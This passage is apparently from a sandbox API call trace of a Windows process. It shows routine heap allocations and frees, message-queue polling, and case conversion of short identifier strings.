(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0268.548] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0268.549] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.550] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.550] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0268.551] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0268.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.552] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0268.552] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.552] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0268.553] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.553] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.554] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0268.554] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.555] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.555] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0268.556] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.556] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.556] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.557] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.557] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.558] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.558] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 